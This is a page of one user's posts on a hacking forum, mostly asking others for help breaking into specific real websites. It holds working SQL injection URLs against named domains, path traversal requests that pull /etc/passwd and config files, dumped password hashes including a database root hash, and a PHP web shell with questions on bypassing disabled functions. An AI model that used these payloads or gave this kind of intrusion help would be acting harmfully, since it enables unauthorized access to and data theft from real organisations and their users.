Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 

Pages: 12Next
Current Page: 1 of 2
Results 1 - 30 of 56
1 year ago
m1cr0n
Can anyone helpme identify backend backend dbms of this website and correct injection: http://bit.ly/16ObrS6 Post: TipoPDC=comboshdtvplus Thanks.
Forum: SQL and Code Injection
1 year ago
m1cr0n
ANyone has idea to bypass asp with null byte on this link: http://bit.ly/17lNtvV Thanks.
Forum: SQL and Code Injection
2 years ago
m1cr0n
one up to verify if anyone have any idea... Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
http://bit.ly/nwU7y1 Anyone can help me make inject on this website? Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all. I am making injection, when I go to get username / password I got this: Username : ŒŠ‹šÍ Password : ŒŠ‹šÍ Anyone know this type of encryptation or conversion???? Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Tools that ruin people's knowledge. You are trying to learn it backwards. http://www.uerj.br/lendo_anote.php?id=90 and 1*9=00 UNION SELECT null,null,null,null,table_name||CHR(36)||column_name,null,null from information_schema.columns-- - columns: cod_usu,dat_cadastr,dat_exc,flg_exc,flg_libera,idt_usu,nom_usu,tip_usu,tms_ult_acesso,txt_email,txt_senha http://www.uerj.br/lendo_anote.php
Forum: SQL and Code Injection
3 years ago
m1cr0n
index.php?do=show_foundations.php&id=null UNION SELECT 1,2,CONVERT(version() USING latin1),4,5,6,7,8,9,10,11-- ;)
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I never used coldfusion, Anyo has idea where is config file: http://www.sexxxyvod.com.br/portal/copa/downloads/download.cfm?myfile=../../Application.cfc Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Look: http://blackhistorycanada.ca/arts.php?themeid=44&id=7 and 1=0 UNION SELECT null,version(),null,null,null,null,null,null-- -
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all, I am trying to ready anything with dompdf in one site, but with no longer results. Maybe dompdf isn't configured. Any idea? The link: http://bit.ly/lsebfN Thanks Bye
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, i am trying inject on this site: http://extranet.vivo-ne.com.br/agentes/cgi-bin/esqueci_senha.plx?login=aaaa'&enviar=enviar But when I try any keyword, he block me. Any idea to got dbname or other things? Thanks.
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all, I got one config file with xpcmdshell, but appear base64, but, isn't. DBConnection=Z0yz5Da9a5UKbY3eEJVLo3UQ7akPuH2UQFGu9mKZbcFFDrDTZIx9gkUeldZiqHuGW1e48y u4Na5ZV6j7PrUupFZKvf4wvjO0fm2I1xKYUaZ0f5jXEpBNqGhwk8QQ4kqGQ1/8wTCsfIRSA4zAFopNrn t/59MvqWKOVF+o+zC3LqlWU7mvDph6klZSteg+um+Idl299jq0Z4RYBYz3LapnlEMej/c8rHyOQ0f82z G/YdpjTKn3X9kO4w== Anyone knows this type of hash? Thanks.
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi for all A error in site, with this can download passwd: http://us.lge.com/filedown.do?filepath=1000000305&fileName=../../../../../../etc/passwd I try to find apache config. file with reiners tutorial. but nothing... Only passwd download is that I got.
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I am trying to download mysql config file, but I cannot found. Here is the link: http://www.b2winc.com/misc/download?url=/../interadmin/inc/functions.php 1 --> Url rewrite rules are in .htaccess . 2 --> I can get the the root password hash: *C63A53D300B2273547F2F3F777CD2CEE17F18410 Thanks.
Forum: SQL and Code Injection
3 years ago
m1cr0n
The table is like this: --|-------------------------| id| password | --|-------------------------| 1 | 1A-F8-58-E7-4A-1D-11-9A | 2 | 11-D3-A4-37-9C-EA-0B-81 | 3 | 50-A7-85-79-E5-88-00-BD | 4 | D1-01-F1-46-DC-D7-74-45 | 5 | AB-D0-EB-DF-5E-6D-06-92 | 6 | 3A-40-4F-A4-57-E4-8D-CF | 7 | 44-AF-A5-62-08-3C-99-56 | 8 | 3B-D9-E5-1E-88-F5-96-12 |
Forum: SQL and Code Injection
3 years ago
m1cr0n
here is the link... I will keep trying: http://bit.ly/h7U7hc
Forum: SQL and Code Injection
3 years ago
m1cr0n
Disable functions : passthru,show_source,shell_exec,system,pcntl_exec,popen,pclose,proc_open,proc_nice,proc_terminate,proc_get_status,proc_close,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid What function can I use now to list files?
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I got one sql injectio, and upload many tools, but don't show dir list, after many tries, i uploaded a simple system($get['c']): http://bit.ly/gKImVz Show me: Warning: system() has been disabled for security reasons in Has one method to bypass this? Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
19. Hash
Anyone know this type of hash? K7lTa5pfbcARo084NkJ6jaFw7qm8N6EE6YAJmOz4Qn4= NVVRrfQWjeGkd1d1G9uNA7Z467b7E7IE6YAJmOz4Qn4= yY54gihNrSva5ynsbRe8X55IwJDOTvM22bE5i+z4Qn4= Thanks
Forum: SQL and Code Injection
3 years ago
m1cr0n
Hi, I am trying to upload a simple php script to server : <? system($_GET['c']); ?> But when upload is complete, I read the file and show me this: <? system($_GET[\'c\']); ?> Have a encode to make this work or other method? Thanks --> accept " and work with ""
Forum: SQL and Code Injection
3 years ago
m1cr0n
I am trying a injection on here: http://www.gree.com.br/pt/ver-produto.php?id=5 But with not success, because when I add any and , stay loading... loading and nothing. Can anyone helpme? Thanks
Forum: SQL and Code Injection
4 years ago
m1cr0n
No one idea...!? I have 2 tables inside a db, with password column with this (that I think hash) hex characters...
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hi for all, I make a injection in onme site, and he show me this hash's: 78-32-A7-59-3E-0D-D7-4E 91-8F-1D-04-6C-22-24-A7 A7-4B-DE-C6-B8-B4-CA-C8 1A-F8-58-E7-4A-1D-11-9A Anyone knows this type of hash? Wich program I use to try to decrypt with rainbow tables, or brute-force. Thanks
Forum: SQL and Code Injection
4 years ago
m1cr0n
I tried a blind with no longer results... sqlmap results: the back-end DBMS is Microsoft SQL Server web application technology: PHP 5.2.6, Apache back-end DBMS: Microsoft SQL Server Unknown sqlmap was not able to fingerprint the back-end database :-(
Forum: SQL and Code Injection
4 years ago
m1cr0n
url encoded, don't work too... Link: http://www.falevono.com.br/portal/_download/dl.php?file= Thanks for all that trying to help .
Forum: SQL and Code Injection
4 years ago
m1cr0n
;) Very good! "The Leader in Advancing Online Confidence" Make me smile.
Forum: Full Disclosure
4 years ago
m1cr0n
Hi for all... I found one download file, coded in php, called dl.php, this file are in subdir(site.com/download/dl.php), and download a cfgs files(dl.php?file=2106.cfg). I has downloaded the dl.php(dl.php?file=dl.php), here is the code: <?php // fool the http server and client browser into thinking the file name // passed in is coming back as a application attachment to save as a file
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hello everybody, Today I am trying make injection in one site, I have found only one point of injection, but, I can't do nothing, take a look: http://www.getnet-tecnologia.com.br/ajax/ajax.php?url=/index_novo/index.php%3Farea%3D6%26hash%3D4e9f92b1d19b0e90e3582fa2f683b94ae0830638%26mid%3D754%20union%20select%20null http://www.getnet-tecnologia.com.br/ajax/ajax.php?url=/index_novo/index.php%3
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hi for all, I am looking this site: http://www.ricardoeletro.com.br/Pagamento/buscarOutrasFormas/20956 post: bandeiraId=2 When I add ', show me this error: "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\') OR PCB.BandeiraId IS NULL) GROUP BY P.PromocaoId, P.DataCadastro, P.Tipo, ' at line 15"
Forum: SQL and Code Injection
4 years ago
m1cr0n
Hi, when a I making aqli on site, union select don't show the columns: http://www.mix.phoneclub.com.br/backoffice/boleto/index.php?id=329666' order by 103;%00 how to do in this situation? Thanks
Forum: SQL and Code Injection
Pages: 12Next
Current Page: 1 of 2